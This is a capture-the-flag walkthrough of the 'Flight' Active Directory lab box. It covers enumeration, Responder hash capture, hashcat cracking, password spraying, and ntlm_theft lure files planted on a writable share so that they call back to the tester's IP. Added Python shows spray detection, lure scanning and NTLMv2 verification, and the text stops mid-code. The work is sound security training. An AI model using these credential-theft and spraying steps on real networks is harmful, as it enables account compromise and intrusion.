1. Reconnaissance
1.1. nmap
The scan result (Kerberos on 88, LDAP on 389/636/3268/3269 and the domain flight.htb) shows that this is an Active Directory environment, and the HTTP service on port 80 shows that a web site is being served.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nmap -sC -sV 10.129.228.120
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-22 08:39 +04
Nmap scan report for 10.129.228.120
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-22 11:39:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-12-22T11:39:58
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.55 seconds
1.2. Failed attempts - rpcclient / smbmap / smbclient
For basic information gathering I tried to enumerate shares and the like, but nothing came back. That leaves the web site as the only remaining attack vector.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# smbmap -H 10.129.228.120
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.228.120, no fun for you...
[*] Closed 1 connections
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# smbclient -N -L //10.129.228.120
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.120 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# rpcclient -U ""%"" 10.129.228.120
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
1.3. Web reconnaissance
There was nothing obvious to work with, and the web page itself had no special content, so I used ffuf to search for subdomains (virtual hosts). This turned up a subdomain named school.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# ffuf -u http://flight.htb -H "Host: FUZZ.flight.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 7069
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://flight.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.flight.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 7069
________________________________________________
school [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 210ms]
:: Progress: [4989/4989] :: Job [1/1] :: 169 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
2. Obtaining Credentials
2.1. Setting up a share
Visiting school.flight.htb shows that pages such as home.html and about.html are loaded through a view parameter. I did not know exactly which other paths existed, and suspicious-looking paths produced an error, so I created a share on my Kali machine and made the parameter point to it.

Conveniently, the host was also running LDAP, so I started Responder, made the server access my share through the view parameter, and received an NTLMv2 hash for the web server's service account.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[...SNIP...]
[SMB] NTLMv2-SSP Client : 10.129.228.120
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:15aa7b110803f00a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
2.2. Cracking the NTLMv2 hash
I cracked the hash with hashcat in mode 5600 (NetNTLMv2) and recovered the password S@Ss!K@*t13.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
[...SNIP...]
SVC_APACHE::flight:15aa7b110803f00a:c3aa6ba688552e57a16999789a57ef1c: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:S@Ss!K@*t13
[...SNIP...]
2.3. Extracting user information
Now that one account is known, I expect to be able to use it to collect information about other accounts. With nxc, the --users option works against SMB, and the same account information can also be collected over LDAP. I put these names into a users file to use in further attacks.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nxc smb 10.129.228.120 -u svc_apache -p 'S@Ss!K@*t13' --users
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.120 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.228.120 445 G0 Administrator 2022-09-22 20:17:02 0 Built-in account for administering the computer/domain
SMB 10.129.228.120 445 G0 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.228.120 445 G0 krbtgt 2022-09-22 19:48:01 0 Key Distribution Center Service Account
SMB 10.129.228.120 445 G0 S.Moon 2022-09-22 20:08:22 0 Junion Web Developer
SMB 10.129.228.120 445 G0 R.Cold 2022-09-22 20:08:22 0 HR Assistant
SMB 10.129.228.120 445 G0 G.Lors 2022-09-22 20:08:22 0 Sales manager
SMB 10.129.228.120 445 G0 L.Kein 2022-09-22 20:08:22 0 Penetration tester
SMB 10.129.228.120 445 G0 M.Gold 2022-09-22 20:08:22 0 Sysadmin
SMB 10.129.228.120 445 G0 C.Bum 2022-09-22 20:08:22 0 Senior Web Developer
SMB 10.129.228.120 445 G0 W.Walker 2022-09-22 20:08:22 0 Payroll officer
SMB 10.129.228.120 445 G0 I.Francis 2022-09-22 20:08:22 0 Nobody knows why he's here
SMB 10.129.228.120 445 G0 D.Truff 2022-09-22 20:08:22 0 Project Manager
SMB 10.129.228.120 445 G0 V.Stevens 2022-09-22 20:08:22 0 Secretary
SMB 10.129.228.120 445 G0 svc_apache 2022-09-22 20:08:23 0 Service Apache web
SMB 10.129.228.120 445 G0 O.Possum 2022-09-22 20:08:23 0 Helpdesk
SMB 10.129.228.120 445 G0 [*] Enumerated 15 local users: flight
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nxc ldap 10.129.228.120 -u svc_apache -p 'S@Ss!K@*t13' --users
LDAP 10.129.228.120 389 G0 [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
LDAP 10.129.228.120 389 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
LDAP 10.129.228.120 389 G0 [*] Enumerated 15 domain users: flight.htb
LDAP 10.129.228.120 389 G0 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.228.120 389 G0 Administrator 2022-09-23 00:17:02 0 Built-in account for administering the computer/domain
LDAP 10.129.228.120 389 G0 Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.228.120 389 G0 krbtgt 2022-09-22 23:48:01 0 Key Distribution Center Service Account
LDAP 10.129.228.120 389 G0 S.Moon 2022-09-23 00:08:22 0 Junion Web Developer
LDAP 10.129.228.120 389 G0 R.Cold 2022-09-23 00:08:22 0 HR Assistant
LDAP 10.129.228.120 389 G0 G.Lors 2022-09-23 00:08:22 0 Sales manager
LDAP 10.129.228.120 389 G0 L.Kein 2022-09-23 00:08:22 0 Penetration tester
LDAP 10.129.228.120 389 G0 M.Gold 2022-09-23 00:08:22 0 Sysadmin
LDAP 10.129.228.120 389 G0 C.Bum 2022-09-23 00:08:22 0 Senior Web Developer
LDAP 10.129.228.120 389 G0 W.Walker 2022-09-23 00:08:22 0 Payroll officer
LDAP 10.129.228.120 389 G0 I.Francis 2022-09-23 00:08:22 0 Nobody knows why he's here
LDAP 10.129.228.120 389 G0 D.Truff 2022-09-23 00:08:22 0 Project Manager
LDAP 10.129.228.120 389 G0 V.Stevens 2022-09-23 00:08:22 0 Secretary
LDAP 10.129.228.120 389 G0 svc_apache 2022-09-23 00:08:23 0 Service Apache web
LDAP 10.129.228.120 389 G0 O.Possum 2022-09-23 00:08:23 0 Helpdesk
2.4. Password spray attack
Having one known password and a list of other account IDs, I checked whether the password works for any other account. The login succeeded for the account s.moon. Just in case, I also checked whether any account uses its username as its password, but none did.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nxc smb 10.129.228.120 -u users -p 'S@Ss!K@*t13' --continue-on-success
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.120 445 G0 [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\krbtgt:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.129.228.120 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
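The spray above leaves a distinctive trace on the domain controller: one source address failing logons for many different accounts within seconds, with a couple of successes in between. The following Python is an added example and not part of the write-up; it implements that detection over constructed, simplified 4625/4624 log lines (the field names mirror the Windows security event fields, but the line format itself is invented for the example, as are the timestamps and the second source address).

```python
"""Flag password spraying in Windows logon events: one source address failing
against many distinct accounts in a short window, then succeeding for a few.

Event IDs: 4625 = failed logon, 4624 = successful logon. The log lines below
are constructed for this example in a simplified key=value form; they are not
real exports from the lab host.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(\S+ \S+) EventID=(\d+) TargetUserName=(\S+) IpAddress=(\S+)")


def parse_events(lines):
    """Return (timestamp, event_id, user_lower, source_ip) tuples, skipping junk."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            events.append((ts, int(m.group(2)), m.group(3).lower(), m.group(4)))
    return sorted(events)


def detect_spray(lines, window=timedelta(minutes=5), min_accounts=5):
    """Per source IP, find the window of failures covering the most distinct
    accounts. Alert when it reaches min_accounts, and list which accounts then
    logged on successfully from the same source (the spray's hits)."""
    by_src = defaultdict(list)
    for ev in parse_events(lines):
        by_src[ev[3]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        failures = [e for e in evs if e[1] == 4625]
        best, span, start = set(), None, 0
        for end in range(len(failures)):            # sliding window over failures
            while failures[end][0] - failures[start][0] > window:
                start += 1
            users = {e[2] for e in failures[start:end + 1]}
            if len(users) > len(best):
                best, span = users, (failures[start][0], failures[end][0])
        if span and len(best) >= min_accounts:
            hits = sorted({e[2] for e in evs
                           if e[1] == 4624 and span[0] <= e[0] <= span[1] + window})
            alerts.append({"source": src, "distinct_accounts": len(best),
                           "first": span[0], "last": span[1], "successes": hits})
    return alerts


# Constructed sample: the account order and outcomes follow the nxc run above,
# one event per second from the attacking host.
_BASE = datetime(2025, 12, 22, 11, 52, 0)
_SPRAY = [("Administrator", 4625), ("Guest", 4625), ("krbtgt", 4625), ("S.Moon", 4624),
          ("R.Cold", 4625), ("G.Lors", 4625), ("L.Kein", 4625), ("M.Gold", 4625),
          ("C.Bum", 4625), ("W.Walker", 4625), ("I.Francis", 4625), ("D.Truff", 4625),
          ("V.Stevens", 4625), ("svc_apache", 4624), ("O.Possum", 4625)]
SAMPLE_LOG = [f"{_BASE + timedelta(seconds=i):%Y-%m-%d %H:%M:%S} EventID={eid} "
              f"TargetUserName={user} IpAddress=10.10.14.143 LogonType=3"
              for i, (user, eid) in enumerate(_SPRAY)]
# Benign noise: one user mistyping their own password a few times over an hour.
SAMPLE_LOG += [f"2025-12-22 09:{m:02d}:00 EventID=4625 TargetUserName=W.Walker "
               f"IpAddress=10.129.1.50 LogonType=2" for m in (5, 30, 55)]

if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_LOG):
        print(alert)
```

The threshold of five distinct accounts in five minutes is deliberately low for a lab; in production it is tuned per source type (a VPN concentrator legitimately authenticates many users), and the interesting signal is the combination of many failures with a handful of successes from the same address.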
2.5. Checking shares with the s.moon account
Enumerating the SMB shares with this account shows that the Shared share grants both READ and WRITE permission.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nxc smb 10.129.228.120 -u s.moon -p 'S@Ss!K@*t13' --shares
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.120 445 G0 [+] flight.htb\s.moon:S@Ss!K@*t13
SMB 10.129.228.120 445 G0 [*] Enumerated shares
SMB 10.129.228.120 445 G0 Share Permissions Remark
SMB 10.129.228.120 445 G0 ----- ----------- ------
SMB 10.129.228.120 445 G0 ADMIN$ Remote Admin
SMB 10.129.228.120 445 G0 C$ Default share
SMB 10.129.228.120 445 G0 IPC$ READ Remote IPC
SMB 10.129.228.120 445 G0 NETLOGON READ Logon server share
SMB 10.129.228.120 445 G0 Shared READ,WRITE
SMB 10.129.228.120 445 G0 SYSVOL READ Logon server share
SMB 10.129.228.120 445 G0 Users READ
SMB 10.129.228.120 445 G0 Web READ
2.6. Gathering information with ntlm_theft
2.6.1. Generating the files
For details on ntlm_theft, see the separate document.
I will generate the malicious files and upload them over SMB. When someone touches one of the files, its embedded path makes the client authenticate to my host, so I generate the files with my Kali IP as the receiving server.
┌──(root㉿kali)-[/home/…/labs/Flight/Flight-2/ntlm_theft]
└─# python ntlm_theft.py -g all -s 10.10.14.143 -f flight
/home/kali/labs/Flight/Flight-2/ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: flight/flight.scf (BROWSE TO FOLDER)
Created: flight/flight-(url).url (BROWSE TO FOLDER)
Created: flight/flight-(icon).url (BROWSE TO FOLDER)
Created: flight/flight.lnk (BROWSE TO FOLDER)
Created: flight/flight.rtf (OPEN)
Created: flight/flight-(stylesheet).xml (OPEN)
Created: flight/flight-(fulldocx).xml (OPEN)
Created: flight/flight.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: flight/flight-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: flight/flight-(includepicture).docx (OPEN)
Created: flight/flight-(remotetemplate).docx (OPEN)
Created: flight/flight-(frameset).docx (OPEN)
Created: flight/flight-(externalcell).xlsx (OPEN)
Created: flight/flight.wax (OPEN)
Created: flight/flight.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: flight/flight.asx (OPEN)
Created: flight/flight.jnlp (OPEN)
Created: flight/flight.application (DOWNLOAD AND OPEN)
Created: flight/flight.pdf (OPEN AND ALLOW)
Created: flight/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: flight/flight.library-ms (BROWSE TO FOLDER)
Created: flight/Autorun.inf (BROWSE TO FOLDER)
Created: flight/desktop.ini (BROWSE TO FOLDER)
Created: flight/flight.theme (THEME TO INSTALL
Generation Complete.
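Files like the ones generated above work because Windows resolves the embedded UNC path or file:// URL and authenticates to whatever host it names. A defender can scan writable shares for exactly such references. The following Python is an added example, not part of the write-up or of ntlm_theft: it scans a directory (a locally mounted share), looks inside Office ZIP containers, and reports every referenced host that is missing from an allowlist. The sample files, the allowlist and the simplified .lnk stand-in are all constructed for the example.

```python
"""Scan a share (mounted locally) for files that would make a Windows client
authenticate to an outside host: SCF/URL/INI/LNK/theme/library-ms files and
Office documents carrying UNC or file:// references. Hosts not on the
allowlist are reported. The sample files are constructed in a temp directory;
the .lnk is a simplified stand-in (UTF-16 path bytes), not a real shortcut.
"""
import re
import tempfile
import zipfile
from pathlib import Path

UNC_RE = re.compile(r"\\\\([A-Za-z0-9_.\-]+)(?=[\\\s\"'<>|]|$)")
URL_RE = re.compile(r"(?:file|https?)://([A-Za-z0-9_.\-]+)")
OFFICE_ZIP = {".docx", ".dotx", ".xlsx", ".pptx"}


def hosts_in(data: bytes) -> set:
    """Hosts referenced by UNC paths or URLs. The bytes are tried as 8-bit text
    and as UTF-16LE, because shortcuts and some INI files store UTF-16 strings."""
    hosts = set()
    for text in (data.decode("latin-1"), data.decode("utf-16-le", errors="ignore")):
        hosts.update(h.lower() for h in UNC_RE.findall(text))
        hosts.update(h.lower() for h in URL_RE.findall(text))
    return hosts


def scan_share(root, trusted_hosts):
    """Return sorted (relative path, host) pairs for references to untrusted hosts."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        if path.suffix.lower() in OFFICE_ZIP and zipfile.is_zipfile(path):
            with zipfile.ZipFile(path) as z:   # OOXML: inspect every part, incl. _rels
                data = b"\n".join(z.read(name) for name in z.namelist())
        else:
            data = path.read_bytes()
        for host in sorted(hosts_in(data)):
            if host not in trusted_hosts:
                findings.append((path.relative_to(root).as_posix(), host))
    return findings


def build_sample_share(root) -> None:
    """Write constructed lure and benign files into root (example data only)."""
    root = Path(root)
    lure = "10.10.14.143"   # the attacker-controlled host used in the write-up
    (root / "flight.scf").write_text(
        f"[Shell]\r\nCommand=2\r\nIconFile=\\\\{lure}\\share\\test.ico\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n")
    (root / "desktop.ini").write_text(
        f"[.ShellClassInfo]\r\nIconResource=\\\\{lure}\\share\\test.ico\r\n")
    (root / "intranet.url").write_text(
        "[InternetShortcut]\r\nURL=https://intranet.flight.htb/\r\n")   # benign
    (root / "flight.lnk").write_bytes(          # simplified stand-in, not a real LNK
        b"L\x00\x00\x00" + f"\\\\{lure}\\share\\doc.docx".encode("utf-16-le"))
    with zipfile.ZipFile(root / "template.docx", "w") as z:
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/settings.xml.rels",
                   f'<Relationship Target="file://{lure}/leak/template.dotx" '
                   'TargetMode="External"/>')


def demo():
    """Build the sample share in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_share(tmp)
        trusted = {"g0", "g0.flight.htb", "flight.htb", "intranet.flight.htb"}
        return scan_share(tmp, trusted)


if __name__ == "__main__":
    for rel_path, host in demo():
        print(f"{rel_path}: references untrusted host {host}")
```

Run against a mounted copy of a share such as Shared or Web, the scan only finds references that are already on disk; pairing it with alerting on outbound SMB from servers to non-file-server hosts catches the lure at the moment it fires.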
2.6.2. Checking the generated files
┌──(root㉿kali)-[/home/…/labs/Flight/Flight-2/ntlm_theft]
└─# cd flight
┌──(root㉿kali)-[/home/…/Flight/Flight-2/ntlm_theft/flight]
└─# ls
Autorun.inf 'flight-(externalcell).xlsx' flight.htm flight.library-ms 'flight-(remotetemplate).docx' flight.theme
desktop.ini 'flight-(frameset).docx' 'flight-(icon).url' flight.lnk flight.rtf 'flight-(url).url'
flight.application 'flight-(fulldocx).xml' 'flight-(includepicture).docx' flight.m3u flight.scf flight.wax
flight.asx 'flight-(handler).htm' flight.jnlp flight.pdf 'flight-(stylesheet).xml' zoom-attack-instructions.txt
2.6.3. Uploading with smbclient
┌──(root㉿kali)-[/home/…/Flight/Flight-2/ntlm_theft/flight]
└─# smbclient //10.129.228.120/Shared -U s.moon%'S@Ss!K@*t13'
Try "help" to get a list of possible commands.
smb: \> prompt false
smb: \> mput *
NT_STATUS_ACCESS_DENIED opening remote file \flight.asx
putting file flight-(fulldocx).xml as \flight-(fulldocx).xml (75.7 kb/s) (average 75.7 kb/s)
putting file flight.theme as \flight.theme (2.9 kb/s) (average 48.4 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \flight.lnk
NT_STATUS_ACCESS_DENIED opening remote file \flight-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \flight.scf
NT_STATUS_ACCESS_DENIED opening remote file \flight-(frameset).docx
NT_STATUS_ACCESS_DENIED opening remote file \flight.pdf
NT_STATUS_ACCESS_DENIED opening remote file \flight-(icon).url
NT_STATUS_ACCESS_DENIED opening remote file \flight.wax
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \flight-(externalcell).xlsx
NT_STATUS_ACCESS_DENIED opening remote file \flight-(remotetemplate).docx
putting file flight-(stylesheet).xml as \flight-(stylesheet).xml (0.3 kb/s) (average 35.3 kb/s)
putting file desktop.ini as \desktop.ini (0.1 kb/s) (average 27.8 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \flight.rtf
NT_STATUS_ACCESS_DENIED opening remote file \flight.m3u
NT_STATUS_ACCESS_DENIED opening remote file \flight.htm
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
putting file flight.jnlp as \flight.jnlp (0.3 kb/s) (average 23.0 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \flight-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \flight-(handler).htm
putting file flight.application as \flight.application (2.9 kb/s) (average 20.0 kb/s)
putting file flight.library-ms as \flight.library-ms (2.1 kb/s) (average 17.6 kb/s)
smb: \>
2.6.4. Receiving NTLM hashes with Responder
┌──(root㉿kali)-[/home/kali]
└─# responder -I tun0
[...SNIP...]
[SMB] NTLMv2-SSP Client : 10.129.228.120
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:a58779842e69f28b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
[*] Skipping previously captured hash for flight.htb\c.bum
[...SNIP...]
2.7. Cracking the c.bum password with hashcat
I ran hashcat again in the same mode and recovered the password Tikkycoll_431012284.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
[...SNIP...]
C.BUM::flight.htb:a58779842e69f28b:8b5309d078ec11fdcf508d399a38e26a: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:Tikkycoll_431012284
[...SNIP...]
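The two hashcat runs in 2.2 and 2.7 make more sense once you know what the captured line contains: `user::domain:server_challenge:NTProofStr:blob`, where NTProofStr is an HMAC-MD5 over the server challenge and the client blob, keyed with a value derived from the NT hash, the upper-cased user name and the domain (MS-NLMP section 3.3.2). The following Python, added here as an example and not taken from the write-up or from hashcat, recomputes that value for a candidate password, so a recovered password can be confirmed (or a captured line checked against a password already known) without running a cracker. MD4 is implemented inline because hashlib's md4 is missing on many OpenSSL 3 builds. The sample challenge, blob and line are constructed; only the user name, domain and password come from the page.

```python
"""Recompute an NTLMv2 response from a candidate password to verify what a
hashcat mode 5600 result proves (MS-NLMP 3.3.2). NT hash = MD4(UTF-16LE(pw))."""
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF
_R3_ORDER = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest, pure Python."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        # Each step updates the first register, then the roles rotate (a,b,c,d) -> (d,a,b,c).
        for i in range(16):                                             # round 1
            f = (b & c) | (~b & d)
            a, b, c, d = d, _rotl((a + f + x[i]) & _MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                             # round 2
            g = (b & c) | (b & d) | (c & d)
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl((a + g + x[k] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                                             # round 3
            h = b ^ c ^ d
            a, b, c, d = d, _rotl((a + h + x[_R3_ORDER[i]] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & _MASK, (b + bb) & _MASK, (c + cc) & _MASK, (d + dd) & _MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NThash, upper(user) + domain), challenge || blob)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def parse_5600(line: str):
    """Split 'user::domain:challenge:proof:blob' into its fields."""
    user, _, domain, chal, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def verify_5600(line: str, candidate: str) -> bool:
    """True if the candidate password reproduces the NTProofStr in the line."""
    user, domain, chal, proof, blob = parse_5600(line)
    return hmac.compare_digest(ntlmv2_proof(candidate, user, domain, chal, blob), proof)


def build_5600(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Produce a mode-5600 line for a known password (used here to build sample data)."""
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample values, NOT the hash captured in the write-up.
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
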